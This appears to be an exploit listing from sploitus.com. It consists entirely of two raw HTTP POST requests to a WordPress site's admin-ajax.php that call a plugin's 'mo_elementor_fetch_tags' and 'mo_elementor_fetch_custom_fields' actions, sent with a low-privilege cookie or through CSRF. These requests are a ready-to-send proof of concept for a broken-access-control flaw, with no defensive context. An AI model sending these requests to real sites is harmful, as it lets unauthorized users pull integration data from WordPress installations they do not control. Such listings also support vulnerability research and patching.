Share
## https://sploitus.com/exploit?id=WPEX-ID:BE8A7C53-D9C5-413C-A561-26B48502F7BE
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 60
Connection: close
Cookie: [low privilege user/CSRF attack]

action=mo_elementor_fetch_tags&connection=CleverReachConnect


POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 93
Connection: close
Cookie: [low privilege user/CSRF attack]

action=mo_elementor_fetch_custom_fields&connection=CleverReachConnect&connection_email_list=a